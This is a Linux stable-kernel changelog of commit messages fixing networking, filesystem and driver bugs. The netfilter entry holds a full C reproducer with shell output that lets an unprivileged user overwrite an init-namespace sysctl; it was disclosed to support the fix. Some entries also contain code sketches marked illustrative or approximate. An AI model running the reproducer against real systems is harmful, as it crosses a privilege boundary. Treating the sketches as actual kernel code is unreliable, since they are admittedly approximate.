Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Thu, 3 Nov 2016 15:59:46 +0000 (08:59 -0700)]
ipv6: dccp: add missing bind_conflict to dccp_ipv6_mapped
[ Upstream commit 990ff4d84408fc55942ca6644f67e361737b3d8e ]
While fuzzing kernel with syzkaller, Andrey reported a nasty crash
in inet6_bind() caused by DCCP lacking a required method.
Fixes: ab1e0a13d7029 ("[SOCK] proto: Add hashinfo member to struct proto")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
Acked-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Thu, 3 Nov 2016 03:30:48 +0000 (20:30 -0700)]
ipv6: dccp: fix out of bound access in dccp_v6_err()
[ Upstream commit 1aa9d1a0e7eefcc61696e147d123453fc0016005 ]
dccp_v6_err() does not use pskb_may_pull() and might access garbage.
We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmpv6_notify() are more than enough.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Thu, 3 Nov 2016 02:00:40 +0000 (19:00 -0700)]
dccp: fix out of bound access in dccp_v4_err()
[ Upstream commit 6706a97fec963d6cb3f7fc2978ec1427b4651214 ]
dccp_v4_err() does not use pskb_may_pull() and might access garbage.
We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmp_socket_deliver() are more than enough.
This patch might allow processing of more ICMP messages, as some routers
are still limiting the size of reflected bytes to 28 (RFC 792), instead
of using extended lengths (RFC 1812 4.3.2.3).
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Thu, 3 Nov 2016 01:04:24 +0000 (18:04 -0700)]
dccp: do not send reset to already closed sockets
[ Upstream commit 346da62cc186c4b4b1ac59f87f4482b47a047388 ]
Andrey reported the following warning while fuzzing with syzkaller
WARNING: CPU: 1 PID: 21072 at net/dccp/proto.c:83 dccp_set_state+0x229/0x290
Kernel panic - not syncing: panic_on_warn set ...
CPU: 1 PID: 21072 Comm: syz-executor Not tainted 4.9.0-rc1+ #293
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
ffff88003d4c7738 ffffffff81b474f4 0000000000000003 dffffc0000000000
ffffffff844f8b00 ffff88003d4c7804 ffff88003d4c7800 ffffffff8140c06a
0000000041b58ab3 ffffffff8479ab7d ffffffff8140beae ffffffff8140cd00
Call Trace:
[< inline >] __dump_stack lib/dump_stack.c:15
[<ffffffff81b474f4>] dump_stack+0xb3/0x10f lib/dump_stack.c:51
[<ffffffff8140c06a>] panic+0x1bc/0x39d kernel/panic.c:179
[<ffffffff8111125c>] __warn+0x1cc/0x1f0 kernel/panic.c:542
[<ffffffff8111144c>] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
[<ffffffff8389e5d9>] dccp_set_state+0x229/0x290 net/dccp/proto.c:83
[<ffffffff838a0aa2>] dccp_close+0x612/0xc10 net/dccp/proto.c:1016
[<ffffffff8316bf1f>] inet_release+0xef/0x1c0 net/ipv4/af_inet.c:415
[<ffffffff82b6e89e>] sock_release+0x8e/0x1d0 net/socket.c:570
[<ffffffff82b6e9f6>] sock_close+0x16/0x20 net/socket.c:1017
[<ffffffff815256ad>] __fput+0x29d/0x720 fs/file_table.c:208
[<ffffffff81525bb5>] ____fput+0x15/0x20 fs/file_table.c:244
[<ffffffff811727d8>] task_work_run+0xf8/0x170 kernel/task_work.c:116
[< inline >] exit_task_work include/linux/task_work.h:21
[<ffffffff8111bc53>] do_exit+0x883/0x2ac0 kernel/exit.c:828
[<ffffffff811221fe>] do_group_exit+0x10e/0x340 kernel/exit.c:931
[<ffffffff81143c94>] get_signal+0x634/0x15a0 kernel/signal.c:2307
[<ffffffff81054aad>] do_signal+0x8d/0x1a30 arch/x86/kernel/signal.c:807
[<ffffffff81003a05>] exit_to_usermode_loop+0xe5/0x130 arch/x86/entry/common.c:156
[< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190
[<ffffffff81006298>] syscall_return_slowpath+0x1a8/0x1e0 arch/x86/entry/common.c:259
[<ffffffff83fc1a62>] entry_SYSCALL_64_fastpath+0xc0/0xc2
Dumping ftrace buffer:
(ftrace buffer empty)
Kernel Offset: disabled
Fix this the same way we did for TCP in commit 565b7b2d2e63 ("tcp: do not send reset to already closed sockets").
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Wed, 2 Nov 2016 14:53:17 +0000 (07:53 -0700)]
tcp: fix potential memory corruption
[ Upstream commit ac9e70b17ecd7c6e933ff2eaf7ab37429e71bf4d ]
Imagine the initial value of max_skb_frags is 17, and the last
skb in the write queue has 15 frags.
Then max_skb_frags is lowered to 14 or a smaller value.
tcp_sendmsg() will then be allowed to add additional page frags
and eventually go past MAX_SKB_FRAGS, overflowing struct
skb_shared_info.
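A sketch of the idea behind the fix: sample the sysctl once per tcp_sendmsg() call so a concurrent change cannot invalidate the limit an skb was built against (illustrative, abridged):
	int max = sysctl_max_skb_frags;		/* read once, use consistently */
	/* ... */
	if (skb_shinfo(skb)->nr_frags >= max)
		goto new_segment;		/* start a new skb, never overflow */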
Fixes: 5f74f82ea34c ("net:Add sysctl_max_skb_frags")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Hans Westgaard Ry <hans.westgaard.ry@oracle.com>
Cc: Håkon Bugge <haakon.bugge@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eli Cooper [Tue, 1 Nov 2016 15:45:12 +0000 (23:45 +0800)]
ip6_tunnel: Clear IP6CB in ip6tunnel_xmit()
[ Upstream commit 23f4ffedb7d751c7e298732ba91ca75d224bc1a6 ]
skb->cb may contain data from previous layers. In the observed scenario,
the garbage data were misinterpreted as IP6CB(skb)->frag_max_size, so
that small packets sent through the tunnel are mistakenly fragmented.
This patch unconditionally clears the control buffer in ip6tunnel_xmit(),
which affects ip6_tunnel, ip6_udp_tunnel and ip6_gre. Currently none of
these tunnels set IP6CB(skb)->flags, otherwise it needs to be done earlier.
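The unconditional clearing is a single memset at the top of ip6tunnel_xmit() (sketch of the described change):
	/* forget whatever a previous layer left behind in skb->cb */
	memset(skb->cb, 0, sizeof(struct inet6_skb_parm));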
Cc: stable@vger.kernel.org
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Andy Gospodarek [Mon, 31 Oct 2016 17:32:03 +0000 (13:32 -0400)]
bgmac: stop clearing DMA receive control register right after it is set
[ Upstream commit fcdefccac976ee51dd6071832b842d8fb41c479c ]
Current bgmac code initializes some DMA settings in the receive control
register for some hardware and then immediately clears those settings.
Not clearing those settings results in ~420Mbps *improvement* in
throughput; this system can now receive frames at line-rate on Broadcom
5871x hardware compared to ~520Mbps today. I also tested a few other
values but found there to be no discernible difference in CPU
utilization even if burst size and prefetching values are different.
On the hardware tested there was no need to keep the code that cleared
all but bits 16-17, but since there is a wide variety of hardware that
used this driver (I did not look at all hardware docs for hardware using
this IP block), I find it wise to move this call up and clear bits just
after reading the default value from the hardware rather than completely
removing it.
This is a good candidate for -stable >=3.14 since that is when the code
that was supposed to improve performance (but did not) was introduced.
Signed-off-by: Andy Gospodarek <gospo@broadcom.com>
Fixes: 56ceecde1f29 ("bgmac: initialize the DMA controller of core...")
Cc: Hauke Mehrtens <hauke@hauke-m.de>
Acked-by: Hauke Mehrtens <hauke@hauke-m.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Sat, 29 Oct 2016 18:02:36 +0000 (11:02 -0700)]
net: mangle zero checksum in skb_checksum_help()
[ Upstream commit 4f2e4ad56a65f3b7d64c258e373cb71e8d2499f4 ]
Sending a zero checksum is ok for TCP, but not for UDP.
A UDPv6 receiver should by default drop a frame with a 0 checksum,
and UDPv4 would not verify the checksum and might accept a corrupted
packet.
Simply replace such checksum by 0xffff, regardless of transport.
This error was caught on SIT tunnels, but seems generic.
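Sketch of the replacement when the folded checksum is written back (assuming the usual skb_checksum_help() layout, with csum and offset already computed):
	/* remap a folded checksum of 0 so UDP receivers do not discard it */
	*(__sum16 *)(skb->data + offset) = csum_fold(csum) ?: CSUM_MANGLED_0;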
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Maciej Żenczykowski <maze@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Fri, 28 Oct 2016 20:40:24 +0000 (13:40 -0700)]
net: clear sk_err_soft in sk_clone_lock()
[ Upstream commit e551c32d57c88923f99f8f010e89ca7ed0735e83 ]
At accept() time, it is possible the parent has a non-zero
sk_err_soft, left over from a prior error.
Make sure we do not leave this value in the child, as it
makes future getsockopt(SO_ERROR) calls quite unreliable.
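The change is essentially one line in sk_clone_lock() (sketch):
	newsk->sk_err_soft = 0;		/* do not inherit the parent's stale soft error */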
Signed-off-by: Eric Dumazet <edumazet@google.com>
Acked-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Florian Westphal [Fri, 28 Oct 2016 16:43:11 +0000 (18:43 +0200)]
dctcp: avoid bogus doubling of cwnd after loss
[ Upstream commit ce6dd23329b1ee6a794acf5f7e40f8e89b8317ee ]
If a congestion control module doesn't provide .undo_cwnd function,
tcp_undo_cwnd_reduction() will set cwnd to
tp->snd_cwnd = max(tp->snd_cwnd, tp->snd_ssthresh << 1);
... which makes sense for reno (it sets ssthresh to half the current cwnd),
but it makes no sense for dctcp, which sets ssthresh based on the current
congestion estimate.
This can cause severe growth of cwnd (eventually overflowing u32).
Fix this by saving last cwnd on loss and restore cwnd based on that,
similar to cubic and other algorithms.
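A sketch of the approach: remember cwnd at loss time and supply an .undo_cwnd callback that restores it (the loss_cwnd field is assumed to be saved in the DCTCP CA state when loss is detected):
	static u32 dctcp_cwnd_undo(struct sock *sk)
	{
		const struct dctcp *ca = inet_csk_ca(sk);

		/* restore the cwnd remembered at loss, never shrink below current */
		return max(tcp_sk(sk)->snd_cwnd, ca->loss_cwnd);
	}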
Fixes: e3118e8359bb7c ("net: tcp: add DCTCP congestion control algorithm")
Cc: Lawrence Brakmo <brakmo@fb.com>
Cc: Andrew Shewmaker <agshew@gmail.com>
Cc: Glenn Judd <glenn.judd@morganstanley.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Greg Kroah-Hartman [Fri, 18 Nov 2016 09:49:03 +0000 (10:49 +0100)]
Linux 4.4.33
Jann Horn [Sun, 18 Sep 2016 19:40:55 +0000 (21:40 +0200)]
netfilter: fix namespace handling in nf_log_proc_dostring
commit dbb5918cb333dfeb8897f8e8d542661d2ff5b9a0 upstream.
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.
Stash the "struct net *" in extra2 - data and extra1 are already used.
Repro code:
#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
char child_stack[1000000];
uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;
void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}
int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
NULL))
err(1, "mount");
/* Yes, we need to set the maps for the net sysctls to recognize us
* as namespace root.
*/
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);
stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}
int main(void) {
outer_uid = getuid();
outer_gid = getgid();
int child = clone(child_fn, child_stack + sizeof(child_stack),
CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
|CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");
char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}
Repro:
$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE
Because this looks like an issue with very low severity, I'm sending it to
the public list directly.
Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Goldwyn Rodrigues [Fri, 30 Sep 2016 15:40:52 +0000 (10:40 -0500)]
btrfs: qgroup: Prevent qgroup->reserved from going subzero
commit 0b34c261e235a5c74dcf78bd305845bd15fe2b42 upstream.
While free'ing qgroup->reserved resources, we must check if
the page has not been invalidated by a truncate operation
by checking if the page is still dirty before reducing the
qgroup resources.
qgroup resources. Resources in such a case are free'd when
the entire extent is released by delayed_ref.
This fixes a double accounting while releasing resources
in case of truncating a file, reproduced by the following testcase.
SCRATCH_DEV=/dev/vdb
SCRATCH_MNT=/mnt
mkfs.btrfs -f $SCRATCH_DEV
mount -t btrfs $SCRATCH_DEV $SCRATCH_MNT
cd $SCRATCH_MNT
btrfs quota enable $SCRATCH_MNT
btrfs subvolume create a
btrfs qgroup limit 500m a $SCRATCH_MNT
sync
for c in {1..15}; do
dd if=/dev/zero bs=1M count=40 of=$SCRATCH_MNT/a/file;
done
sleep 10
sync
sleep 5
touch $SCRATCH_MNT/a/newfile
echo "Removing file"
rm $SCRATCH_MNT/a/file
Fixes: b9d0b38928 ("btrfs: Add handler for invalidate page")
Signed-off-by: Goldwyn Rodrigues <rgoldwyn@suse.com>
Reviewed-by: Qu Wenruo <quwenruo@cn.fujitsu.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Fabio Estevam [Sat, 5 Nov 2016 19:45:07 +0000 (17:45 -0200)]
mmc: mxs: Initialize the spinlock prior to using it
commit f91346e8b5f46aaf12f1df26e87140584ffd1b3f upstream.
An interrupt may occur right after devm_request_irq() is called and
prior to the spinlock initialization, leading to a kernel oops,
as the interrupt handler uses the spinlock.
In order to prevent this problem, move the spinlock initialization
prior to requesting the interrupts.
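Sketch of the reordering in probe (the handler and IRQ variable names follow the driver as remembered, so treat them as approximate):
	spin_lock_init(&host->lock);	/* the IRQ handler takes this lock */

	ret = devm_request_irq(&pdev->dev, irq_err, mxs_mmc_irq_handler, 0,
			       dev_name(&pdev->dev), host);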
Fixes: e4243f13d10e (mmc: mxs-mmc: add mmc host driver for i.MX23/28)
Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com>
Reviewed-by: Marek Vasut <marex@denx.de>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Chen-Yu Tsai [Mon, 31 Oct 2016 06:42:09 +0000 (14:42 +0800)]
ASoC: sun4i-codec: return error code instead of NULL when create_card fails
commit 85915b63ad8b796848f431b66c9ba5e356e722e5 upstream.
When sun4i_codec_create_card fails, we do not assign a proper error
code to the return value. The return value would be 0 from the previous
function call, or we would have bailed out sooner. This would confuse
the driver core into thinking the device probe succeeded, when in fact
it didn't, leaving various devres based resources lingering.
Make the create_card function pass back a meaningful error code, and
assign it to the return value.
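Sketch of the probe-side handling once create_card() reports failures via ERR_PTR (the error label is illustrative):
	card = sun4i_codec_create_card(dev);
	if (IS_ERR(card)) {
		ret = PTR_ERR(card);	/* propagate the real error code */
		dev_err(dev, "Failed to create our card\n");
		goto err_unregister;
	}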
Fixes: 45fb6b6f2aa3 ("ASoC: sunxi: add support for the on-chip codec on
early Allwinner SoCs")
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Punit Agrawal [Tue, 18 Oct 2016 16:07:19 +0000 (17:07 +0100)]
ACPI / APEI: Fix incorrect return value of ghes_proc()
commit 806487a8fc8f385af75ed261e9ab658fc845e633 upstream.
Although ghes_proc() tests for errors while reading the error status,
it always returns success (0). Fix this by propagating the return
value.
Fixes: d334a49113a4a33 (ACPI, APEI, Generic Hardware Error Source memory error support)
Signed-off-by: Punit Agrawal <punit.agrawal@arm.com>
Tested-by: Tyler Baicar <tbaicar@codeaurora.org>
Reviewed-by: Borislav Petkov <bp@suse.de>
[ rjw: Subject ]
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Huaibin Wang [Mon, 26 Sep 2016 07:51:18 +0000 (09:51 +0200)]
i40e: fix call of ndo_dflt_bridge_getlink()
commit 599b076d15ee3ead7af20fc907079df00b2d59a0 upstream.
Order of arguments is wrong.
The wrong code has been introduced by commit 7d4f8d871ab1, but is
compiled only since commit 9df70b66418e.
Note that this may break netlink dumps.
Fixes: 9df70b66418e ("i40e: Remove incorrect #ifdef's")
Fixes: 7d4f8d871ab1 ("switchdev; add VLAN support for port's bridge_getlink")
CC: Carolyn Wyborny <carolyn.wyborny@intel.com>
Signed-off-by: Huaibin Wang <huaibin.wang@6wind.com>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Tested-by: Andrew Bowers <andrewx.bowers@intel.com>
Signed-off-by: Jeff Kirsher <jeffrey.t.kirsher@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Andrew Lutomirski [Mon, 17 Oct 2016 17:06:27 +0000 (10:06 -0700)]
hwrng: core - Don't use a stack buffer in add_early_randomness()
commit 6d4952d9d9d4dc2bb9c0255d95a09405a1e958f7 upstream.
hw_random carefully avoids using a stack buffer except in
add_early_randomness(). This causes a crash in virtio_rng if
CONFIG_VMAP_STACK=y.
Reported-by: Matt Mullins <mmullins@mmlx.us>
Tested-by: Matt Mullins <mmullins@mmlx.us>
Fixes: d3cc7996473a ("hwrng: fetch randomness only after device init")
Signed-off-by: Andy Lutomirski <luto@kernel.org>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Daniel Mentz [Fri, 28 Oct 2016 00:46:59 +0000 (17:46 -0700)]
lib/genalloc.c: start search from start of chunk
commit 62e931fac45b17c2a42549389879411572f75804 upstream.
gen_pool_alloc_algo() iterates over the chunks of a pool trying to find
a contiguous block of memory that satisfies the allocation request.
The shortcut
if (size > atomic_read(&chunk->avail))
continue;
makes the loop skip over chunks that do not have enough bytes left to
fulfill the request. There are two situations, though, where an
allocation might still fail:
(1) The available memory is not contiguous, i.e. the request cannot
be fulfilled due to external fragmentation.
(2) A race condition. Another thread runs the same code concurrently
and is quicker to grab the available memory.
In those situations, the loop calls pool->algo() to search the entire
chunk, and pool->algo() returns some value that is >= end_bit to
indicate that the search failed. This return value is then assigned to
start_bit. The variables start_bit and end_bit describe the range that
should be searched, and this range should be reset for every chunk that
is searched. Today, the code fails to reset start_bit to 0. As a
result, prefixes of subsequent chunks are ignored. Memory allocations
might fail even though there is plenty of room left in these prefixes of
those other chunks.
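Sketch of the loop with the missing reset added (abridged from the shape of gen_pool_alloc_algo(); chunk_size() and order as used there):
	list_for_each_entry_rcu(chunk, &pool->chunks, next_chunk) {
		if (size > atomic_read(&chunk->avail))
			continue;

		start_bit = 0;		/* search every chunk from its start */
		end_bit = chunk_size(chunk) >> order;
		/* ... run pool->algo() over [start_bit, end_bit) ... */
	}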
Fixes: 7f184275aa30 ("lib, Make gen_pool memory allocator lockless")
Link: http://lkml.kernel.org/r/1477420604-28918-1-git-send-email-danielmentz@google.com
Signed-off-by: Daniel Mentz <danielmentz@google.com>
Reviewed-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
Acked-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Alexander Usyskin [Mon, 31 Oct 2016 17:02:39 +0000 (19:02 +0200)]
mei: bus: fix received data size check in NFC fixup
commit 582ab27a063a506ccb55fc48afcc325342a2deba upstream.
The NFC version reply size is checked against only the header size, not
against the full message size. That may potentially lead to uninitialized
memory access in the version data.
That leads to warnings when version data is accessed:
drivers/misc/mei/bus-fixup.c: warning: '*((void *)&ver+11)' may be used uninitialized in this function [-Wuninitialized]: => 212:2
Reported in
Build regressions/improvements in v4.9-rc3
https://lkml.org/lkml/2016/10/30/57
Fixes: 59fcd7c63abf (mei: nfc: Initial nfc implementation)
Signed-off-by: Alexander Usyskin <alexander.usyskin@intel.com>
Signed-off-by: Tomas Winkler <tomas.winkler@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Joerg Roedel [Tue, 8 Nov 2016 14:08:26 +0000 (15:08 +0100)]
iommu/vt-d: Fix dead-locks in disable_dmar_iommu() path
commit bea64033dd7b5fb6296eda8266acab6364ce1554 upstream.
It turns out that the disable_dmar_iommu() code-path tried
to get the device_domain_lock recursively, which will
dead-lock when this code runs on dmar removal. Fix both
code-paths that could lead to the dead-lock.
Fixes: 55d940430ab9 ('iommu/vt-d: Get rid of domain->iommu_lock')
Signed-off-by: Joerg Roedel <jroedel@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Baoquan He [Thu, 15 Sep 2016 08:50:52 +0000 (16:50 +0800)]
iommu/amd: Free domain id when free a domain of struct dma_ops_domain
commit c3db901c54466a9c135d1e6e95fec452e8a42666 upstream.
The current code missed freeing the domain id when freeing a domain of
struct dma_ops_domain.
Signed-off-by: Baoquan He <bhe@redhat.com>
Fixes: ec487d1a110a ('x86, AMD IOMMU: add domain allocation and deallocation functions')
Signed-off-by: Joerg Roedel <jroedel@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Richard Genoud [Thu, 27 Oct 2016 16:04:06 +0000 (18:04 +0200)]
tty/serial: at91: fix hardware handshake on Atmel platforms
commit 9bcffe7575b721d7b6d9b3090fe18809d9806e78 upstream.
After commit 1cf6e8fc8341 ("tty/serial: at91: fix RTS line management
when hardware handshake is enabled"), the hardware handshake wasn't
functional anymore on Atmel platforms (beside SAMA5D2).
To understand why, one has to understand the flag ATMEL_US_USMODE_HWHS
first:
Before commit 1cf6e8fc8341 ("tty/serial: at91: fix RTS line management
when hardware handshake is enabled"), this flag was never set.
Thus, the CTS/RTS where only handled by serial_core (and everything
worked just fine).
This commit introduced the use of the ATMEL_US_USMODE_HWHS flag,
enabling it for all boards when the user space enables flow control.
When the ATMEL_US_USMODE_HWHS is set, the Atmel USART controller
handles a part of the flow control job:
- disable the transmitter when the CTS pin gets high.
- drive the RTS pin high when the DMA buffer transfer is completed or
PDC RX buffer full or RX FIFO is beyond threshold. (depending on the
controller version).
NB: This feature is *not* mandatory for the flow control to work.
(Nevertheless, it's very useful if low latencies are needed.)
Now, the specifics of the ATMEL_US_USMODE_HWHS flag:
- For platforms with DMAC and no FIFOs (sam9x25, sam9x35, sama5D3,
sama5D4, sam9g15, sam9g25, sam9g35)* this feature simply doesn't work.
( source: https://lkml.org/lkml/2016/9/7/598 )
Tested it on sam9g35, the RTS pin always stays up, even when RXEN=1
or a new DMA transfer descriptor is set.
=> ATMEL_US_USMODE_HWHS must not be used for those platforms
- For platforms with a PDC (sam926{0,1,3}, sam9g10, sam9g20, sam9g45,
sam9g46)*, there's another kind of problem. Once the flag
ATMEL_US_USMODE_HWHS is set, the RTS pin can't be driven anymore via
RTSEN/RTSDIS in USART Control Register. The RTS pin can only be driven
by enabling/disabling the receiver or setting RCR=RNCR=0 in the PDC
(Receive (Next) Counter Register).
=> Doing this is beyond the scope of this patch and could add other
bugs, so the original (and working) behaviour should be set for those
platforms (meaning ATMEL_US_USMODE_HWHS flag should be unset).
- For platforms with a FIFO (sama5d2)*, the RTS pin is driven according
to the RX FIFO thresholds, and can be also driven by RTSEN/RTSDIS in
USART Control Register. No problem here.
(This was the use case of commit 1cf6e8fc8341 ("tty/serial: at91: fix
RTS line management when hardware handshake is enabled"))
NB: If the CTS pin declared as a GPIO in the DTS, (for instance
cts-gpios = <&pioA PIN_PB31 GPIO_ACTIVE_LOW>), the transmitter will be
disabled.
=> ATMEL_US_USMODE_HWHS flag can be set for this platform ONLY IF the
CTS pin is not a GPIO.
So, the only case when ATMEL_US_USMODE_HWHS can be enabled is when
(atmel_use_fifo(port) &&
!mctrl_gpio_to_gpiod(atmel_port->gpios, UART_GPIO_CTS))
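In code, that condition ends up looking roughly like this (sketch; mode is the USART mode register value being assembled):
	if (atmel_use_fifo(port) &&
	    !mctrl_gpio_to_gpiod(atmel_port->gpios, UART_GPIO_CTS))
		mode |= ATMEL_US_USMODE_HWHS;
	else
		mode |= ATMEL_US_USMODE_NORMAL;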
Tested on all Atmel USART controller flavours:
AT91SAM9G35-CM (DMAC flavour), AT91SAM9G20-EK (PDC flavour),
SAMA5D2xplained (FIFO flavour).
* the list may not be exhaustive
Fixes: 1cf6e8fc8341 ("tty/serial: at91: fix RTS line management when hardware handshake is enabled")
Signed-off-by: Richard Genoud <richard.genoud@gmail.com>
Acked-by: Alexandre Belloni <alexandre.belloni@free-electrons.com>
Acked-by: Cyrille Pitchen <cyrille.pitchen@atmel.com>
Acked-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
[nicolas.ferre@atmel.com: adapt to 4.4.x kernel for stable by adding
the atmel_port variable declaration which was missing]
Signed-off-by: Nicolas Ferre <nicolas.ferre@atmel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Ludovic Desroches [Mon, 23 Nov 2015 13:09:39 +0000 (14:09 +0100)]
dmaengine: at_xdmac: fix spurious flag status for mem2mem transfers
commit 95da0c19d164f6df0b71a5187950f47d4b746e91 upstream.
When setting the channel configuration register, the perid field is not
set to 0 since it is useless for mem2mem transfers. Unfortunately, a
device has 0 as perid. It could cause spurious flag status because
the controller could mix some events from the two channels.
For that reason, use the highest perid value for mem2mem transfers since it
doesn't match the perid of other devices.
Signed-off-by: Ludovic Desroches <ludovic.desroches@atmel.com>
Acked-by: Nicolas Ferre <nicolas.ferre@atmel.com>
Signed-off-by: Vinod Koul <vinod.koul@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Ville Syrjälä [Tue, 11 Oct 2016 17:52:46 +0000 (20:52 +0300)]
drm/i915: Respect alternate_ddc_pin for all DDI ports
commit 8d83bc22b259e5526625b6d298f637786c71129f upstream.
The VBT provides the platform a way to mix and match the DDI ports vs.
GMBUS pins. Currently we only trust the VBT for DDI E, which I suppose
has no standard GMBUS pin assignment. However, there are machines out
there that use a non-standard mapping for the other ports as well.
Let's start trusting the VBT on this one for all ports on DDI platforms.
I've structured the code such that other platforms could easily start
using this as well, by simply filling in the ddi_port_info. IIRC there
may be CHV system that might actually need this.
v2: Include a commit message, include a debug message during init
Cc: Maarten Maathuis <madman2003@gmail.com>
Tested-by: Maarten Maathuis <madman2003@gmail.com>
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=97877
Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1476208368-5710-3-git-send-email-ville.syrjala@linux.intel.com
Reviewed-by: Jim Bride <jim.bride@linux.intel.com>
(cherry picked from commit e4ab73a13291fc844c9e24d5c347bd95818544d2)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
